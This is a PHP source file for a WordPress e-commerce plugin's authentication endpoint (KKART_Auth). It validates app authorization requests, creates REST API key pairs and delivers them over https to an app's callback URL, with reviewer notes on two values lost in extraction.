<?php
/**
 * Kkart Auth
 *
 * Handles kkart-auth endpoint requests.
 *
 * @package Kkart\RestApi
 * @since   2.4.0
 */

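defined( 'ABSPATH' ) || exit; // Loaded outside WordPress (e.g. requested directly): stop before declaring anything.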

/**
 * Auth class.
 */
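class KKART_Auth {

    /**
     * Endpoint version; forms the `kkart-auth/v{VERSION}/` URL prefix registered in add_endpoint().
     *
     * @var int
     */
    const VERSION = 1;

    /**
     * Permission scopes an application may request.
     *
     * Shared by make_validation() and create_keys() so both agree on what is accepted.
     *
     * @var string[]
     */
    const SCOPES = array( 'read', 'write', 'read_write' );

    /**
     * Setup class: wire the query vars, the rewrite rule and the request handler.
     *
     * NOTE(review): the numeric priority argument of these three hooks was lost
     * when this listing was extracted; 0 is what the equivalent upstream
     * WooCommerce WC_Auth class passes — confirm against the shipped file.
     *
     * @since 2.4.0
     */
    public function __construct() {
        // Add query vars.
        add_filter( 'query_vars', array( $this, 'add_query_vars' ), 0 );

        // Register auth endpoint.
        add_action( 'init', array( __CLASS__, 'add_endpoint' ), 0 );

        // Handle auth requests.
        add_action( 'parse_request', array( $this, 'handle_auth_requests' ), 0 );
    }

    /**
     * Add the two query vars the rewrite rule in add_endpoint() populates.
     *
     * @since  2.4.0
     * @param  array $vars Query variables.
     * @return string[]
     */
    public function add_query_vars( $vars ) {
        $vars[] = 'kkart-auth-version';
        $vars[] = 'kkart-auth-route';
        return $vars;
    }

    /**
     * Add auth endpoint: `kkart-auth/v1/<route>` maps to the two query vars above.
     *
     * @since 2.4.0
     */
    public static function add_endpoint() {
        add_rewrite_rule( '^kkart-auth/v([1]{1})/(.*)?', 'index.php?kkart-auth-version=$matches[1]&kkart-auth-route=$matches[2]', 'top' );
    }

    /**
     * Get the translated, human-readable name of a scope.
     *
     * Unknown scopes used to raise an undefined-index notice and yield null; an
     * empty string is returned instead so sprintf()/template callers stay clean.
     *
     * @since  2.4.0
     * @param  string $scope Permission scope.
     * @return string
     */
    protected function get_i18n_scope( $scope ) {
        $permissions = array(
            'read'       => __( 'Read', 'kkart' ),
            'write'      => __( 'Write', 'kkart' ),
            'read_write' => __( 'Read/Write', 'kkart' ),
        );

        return isset( $permissions[ $scope ] ) ? $permissions[ $scope ] : '';
    }

    /**
     * Return a list of translated permission descriptions a scope allows.
     *
     * Shown to the user on the grant-access form; an unknown scope yields an
     * empty list (after the filter).
     *
     * @since  2.4.0
     * @param  string $scope Permission scope.
     * @return array
     */
    protected function get_permissions_in_scope( $scope ) {
        $permissions = array();

        switch ( $scope ) {
            case 'read':
                $permissions[] = __( 'View coupons', 'kkart' );
                $permissions[] = __( 'View customers', 'kkart' );
                $permissions[] = __( 'View orders and sales reports', 'kkart' );
                $permissions[] = __( 'View products', 'kkart' );
                break;
            case 'write':
                $permissions[] = __( 'Create webhooks', 'kkart' );
                $permissions[] = __( 'Create coupons', 'kkart' );
                $permissions[] = __( 'Create customers', 'kkart' );
                $permissions[] = __( 'Create orders', 'kkart' );
                $permissions[] = __( 'Create products', 'kkart' );
                break;
            case 'read_write':
                $permissions[] = __( 'Create webhooks', 'kkart' );
                $permissions[] = __( 'View and manage coupons', 'kkart' );
                $permissions[] = __( 'View and manage customers', 'kkart' );
                $permissions[] = __( 'View and manage orders and sales reports', 'kkart' );
                $permissions[] = __( 'View and manage products', 'kkart' );
                break;
        }

        return apply_filters( 'kkart_api_permissions_in_scope', $permissions, $scope );
    }

    /**
     * Build an auth URL for a given endpoint, carrying the request data along as query args.
     *
     * Every value is run through kkart_clean()/rawurlencode() before it is placed
     * in the URL; the two URL parameters are normalised with get_formatted_url() first.
     *
     * @since  2.4.0
     * @param  array  $data     Data to build URL.
     * @param  string $endpoint Endpoint.
     * @return string
     */
    protected function build_url( $data, $endpoint ) {
        $url = kkart_get_endpoint_url( 'kkart-auth/v' . self::VERSION, $endpoint, home_url( '/' ) );

        return add_query_arg(
            array(
                'app_name'     => kkart_clean( $data['app_name'] ),
                'user_id'      => kkart_clean( $data['user_id'] ),
                'return_url'   => rawurlencode( $this->get_formatted_url( $data['return_url'] ) ),
                'callback_url' => rawurlencode( $this->get_formatted_url( $data['callback_url'] ) ),
                'scope'        => kkart_clean( $data['scope'] ),
            ),
            $url
        );
    }

    /**
     * Decode a URL and make sure it carries a scheme (https:// is assumed when none is given).
     *
     * This only normalises the string; validity is checked in make_validation().
     *
     * @param  string $url URL.
     * @return string
     */
    protected function get_formatted_url( $url ) {
        $url = urldecode( $url );

        if ( ! strstr( $url, '://' ) ) {
            $url = 'https://' . $url;
        }

        return $url;
    }

    /**
     * Validate the incoming auth request.
     *
     * Checks that every required parameter is present, that the scope is one of
     * self::SCOPES, that both URLs pass FILTER_VALIDATE_URL, and that callback_url
     * is https — the consumer secret is later POSTed to it (see post_consumer_data()).
     *
     * @since  2.4.0
     * @throws Exception When validate fails.
     */
    protected function make_validation() {
        $data   = array();
        $params = array(
            'app_name',
            'user_id',
            'return_url',
            'callback_url',
            'scope',
        );

        foreach ( $params as $param ) {
            if ( empty( $_REQUEST[ $param ] ) ) { // WPCS: input var ok, CSRF ok.
                /* translators: %s: parameter */
                throw new Exception( sprintf( __( 'Missing parameter %s', 'kkart' ), $param ) );
            }

            $data[ $param ] = wp_unslash( $_REQUEST[ $param ] ); // WPCS: input var ok, CSRF ok, sanitization ok.
        }

        if ( ! in_array( $data['scope'], self::SCOPES, true ) ) {
            /* translators: %s: scope */
            throw new Exception( sprintf( __( 'Invalid scope %s', 'kkart' ), kkart_clean( $data['scope'] ) ) );
        }

        foreach ( array( 'return_url', 'callback_url' ) as $param ) {
            // Separate variable: the original reused $param here, shadowing the loop key.
            $url = $this->get_formatted_url( $data[ $param ] );

            if ( false === filter_var( $url, FILTER_VALIDATE_URL ) ) {
                /* translators: %s: url */
                throw new Exception( sprintf( __( 'The %s is not a valid URL', 'kkart' ), $url ) );
            }
        }

        $callback_url = $this->get_formatted_url( $data['callback_url'] );

        // The key material is delivered to this URL, so refuse anything that is not https.
        if ( 0 !== stripos( $callback_url, 'https://' ) ) {
            throw new Exception( __( 'The callback_url needs to be over SSL', 'kkart' ) );
        }
    }

    /**
     * Create an API key pair for the current user and store it.
     *
     * The consumer key is stored hashed (kkart_api_hash()) plus a truncated
     * display form; the consumer secret is stored as given. The returned array is
     * what gets POSTed to the app's callback_url.
     *
     * @since  2.4.0
     *
     * @param  string $app_name    App name.
     * @param  string $app_user_id User ID.
     * @param  string $scope       Scope.
     *
     * @return array
     */
    protected function create_keys( $app_name, $app_user_id, $scope ) {
        global $wpdb;

        $description = sprintf(
            /* translators: 1: app name 2: scope 3: date 4: time */
            __( '%1$s - API %2$s (created on %3$s at %4$s).', 'kkart' ),
            kkart_clean( $app_name ),
            $this->get_i18n_scope( $scope ),
            date_i18n( kkart_date_format() ),
            date_i18n( kkart_time_format() )
        );
        $user = wp_get_current_user();

        // Created API keys. Scope falls back to the least-privileged value if it is not recognised.
        $permissions     = in_array( $scope, self::SCOPES, true ) ? sanitize_text_field( $scope ) : 'read';
        $consumer_key    = 'ck_' . kkart_rand_hash();
        $consumer_secret = 'cs_' . kkart_rand_hash();

        $wpdb->insert(
            $wpdb->prefix . 'kkart_api_keys',
            array(
                'user_id'         => $user->ID,
                'description'     => $description,
                'permissions'     => $permissions,
                'consumer_key'    => kkart_api_hash( $consumer_key ),
                'consumer_secret' => $consumer_secret,
                // NOTE(review): the length digit was lost in extraction; 7 matches the
                // upstream WooCommerce truncated_key convention — confirm against the shipped file.
                'truncated_key'   => substr( $consumer_key, -7 ),
            ),
            array(
                '%d',
                '%s',
                '%s',
                '%s',
                '%s',
                '%s',
            )
        );

        return array(
            'key_id'          => $wpdb->insert_id,
            'user_id'         => $app_user_id,
            'consumer_key'    => $consumer_key,
            'consumer_secret' => $consumer_secret,
            'key_permissions' => $permissions,
        );
    }

    /**
     * POST the newly created consumer data (key + secret) as JSON to the app's callback URL.
     *
     * Uses wp_safe_remote_post(), which refuses non-safe hosts; anything other
     * than an HTTP 200 reply is treated as failure so the caller can roll the key back.
     *
     * @since  2.4.0
     *
     * @throws Exception When validation fails.
     * @param  array  $consumer_data Consumer data.
     * @param  string $url           URL.
     * @return bool
     */
    protected function post_consumer_data( $consumer_data, $url ) {
        $params = array(
            'body'    => wp_json_encode( $consumer_data ),
            'timeout' => 60,
            'headers' => array(
                'Content-Type' => 'application/json;charset=' . get_bloginfo( 'charset' ),
            ),
        );

        $response = wp_safe_remote_post( esc_url_raw( $url ), $params );

        if ( is_wp_error( $response ) ) {
            throw new Exception( $response->get_error_message() );
        } elseif ( 200 !== intval( $response['response']['code'] ) ) {
            throw new Exception( __( 'An error occurred in the request and at the time were unable to send the consumer data', 'kkart' ) );
        }

        return true;
    }

    /**
     * Handle auth requests: pick up the two query vars (from the rewrite rule or
     * directly from $_GET) and dispatch to auth_endpoint() when both are present.
     *
     * @since 2.4.0
     * @throws Exception When auth_endpoint validation fails.
     */
    public function handle_auth_requests() {
        global $wp;

        if ( ! empty( $_GET['kkart-auth-version'] ) ) { // WPCS: input var ok, CSRF ok.
            $wp->query_vars['kkart-auth-version'] = kkart_clean( wp_unslash( $_GET['kkart-auth-version'] ) ); // WPCS: input var ok, CSRF ok.
        }

        if ( ! empty( $_GET['kkart-auth-route'] ) ) { // WPCS: input var ok, CSRF ok.
            $wp->query_vars['kkart-auth-route'] = kkart_clean( wp_unslash( $_GET['kkart-auth-route'] ) ); // WPCS: input var ok, CSRF ok.
        }

        // kkart-auth endpoint requests.
        if ( ! empty( $wp->query_vars['kkart-auth-version'] ) && ! empty( $wp->query_vars['kkart-auth-route'] ) ) {
            $this->auth_endpoint( $wp->query_vars['kkart-auth-route'] );
        }
    }

    /**
     * Auth endpoint: login -> authorize -> access_granted.
     *
     * `login` and `authorize` render templates or redirect depending on the
     * session; `access_granted` requires the manage_kkart capability plus a
     * valid `kkart_auth_grant_access` nonce, creates the key pair, POSTs it to
     * callback_url and redirects to return_url. Any Exception deletes a key that
     * was already created and ends the request with a 401 wp_die().
     *
     * @since 2.4.0
     * @throws Exception When validation fails.
     * @param string $route Route.
     */
    protected function auth_endpoint( $route ) {
        ob_start();

        $consumer_data = array();

        try {
            $route = strtolower( kkart_clean( $route ) );
            $this->make_validation();

            $data = wp_unslash( $_REQUEST ); // WPCS: input var ok, CSRF ok.

            // Login endpoint.
            if ( 'login' === $route && ! is_user_logged_in() ) {
                kkart_get_template(
                    'auth/form-login.php', array(
                        'app_name'     => kkart_clean( $data['app_name'] ),
                        'return_url'   => add_query_arg(
                            array(
                                'success' => 0,
                                'user_id' => kkart_clean( $data['user_id'] ),
                            ),
                            $this->get_formatted_url( $data['return_url'] )
                        ),
                        'redirect_url' => $this->build_url( $data, 'authorize' ),
                    )
                );
                exit;

            } elseif ( 'login' === $route && is_user_logged_in() ) {
                // Redirect with user is logged in.
                wp_redirect( esc_url_raw( $this->build_url( $data, 'authorize' ) ) );
                exit;

            } elseif ( 'authorize' === $route && ! is_user_logged_in() ) {
                // Redirect with user is not logged in and trying to access the authorize endpoint.
                wp_redirect( esc_url_raw( $this->build_url( $data, 'login' ) ) );
                exit;

            } elseif ( 'authorize' === $route && current_user_can( 'manage_kkart' ) ) {
                // Authorize endpoint.
                kkart_get_template(
                    'auth/form-grant-access.php', array(
                        'app_name'    => kkart_clean( $data['app_name'] ),
                        'return_url'  => add_query_arg(
                            array(
                                'success' => 0,
                                'user_id' => kkart_clean( $data['user_id'] ),
                            ),
                            $this->get_formatted_url( $data['return_url'] )
                        ),
                        'scope'       => $this->get_i18n_scope( kkart_clean( $data['scope'] ) ),
                        'permissions' => $this->get_permissions_in_scope( kkart_clean( $data['scope'] ) ),
                        'granted_url' => wp_nonce_url( $this->build_url( $data, 'access_granted' ), 'kkart_auth_grant_access', 'kkart_auth_nonce' ),
                        'logout_url'  => wp_logout_url( $this->build_url( $data, 'login' ) ),
                        'user'        => wp_get_current_user(),
                    )
                );
                exit;

            } elseif ( 'access_granted' === $route && current_user_can( 'manage_kkart' ) ) {
                // Granted access endpoint: the nonce ties this request to the grant form above.
                if ( ! isset( $_GET['kkart_auth_nonce'] ) || ! wp_verify_nonce( sanitize_key( wp_unslash( $_GET['kkart_auth_nonce'] ) ), 'kkart_auth_grant_access' ) ) { // WPCS: input var ok.
                    throw new Exception( __( 'Invalid nonce verification', 'kkart' ) );
                }

                $consumer_data = $this->create_keys( $data['app_name'], $data['user_id'], $data['scope'] );
                $response      = $this->post_consumer_data( $consumer_data, $this->get_formatted_url( $data['callback_url'] ) );

                if ( $response ) {
                    wp_redirect(
                        esc_url_raw(
                            add_query_arg(
                                array(
                                    'success' => 1,
                                    'user_id' => kkart_clean( $data['user_id'] ),
                                ),
                                $this->get_formatted_url( $data['return_url'] )
                            )
                        )
                    );
                    exit;
                }
            } else {
                throw new Exception( __( 'You do not have permission to access this page', 'kkart' ) );
            }
        } catch ( Exception $e ) {
            // Roll back a key that was created but could not be delivered.
            $this->maybe_delete_key( $consumer_data );

            /* translators: %s: error message */
            wp_die( sprintf( esc_html__( 'Error: %s.', 'kkart' ), esc_html( $e->getMessage() ) ), esc_html__( 'Access denied', 'kkart' ), array( 'response' => 401 ) );
        }
    }

    /**
     * Delete the API key identified by $key['key_id'], if the array carries one.
     *
     * Called from the auth_endpoint() error path; a no-op for an empty array.
     *
     * @since 2.4.0
     *
     * @param array $key Key.
     */
    private function maybe_delete_key( $key ) {
        global $wpdb;

        if ( isset( $key['key_id'] ) ) {
            $wpdb->delete( $wpdb->prefix . 'kkart_api_keys', array( 'key_id' => $key['key_id'] ), array( '%d' ) );
        }
    }
}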
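// Instantiate at load time so the constructor registers its hooks.
new KKART_Auth();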
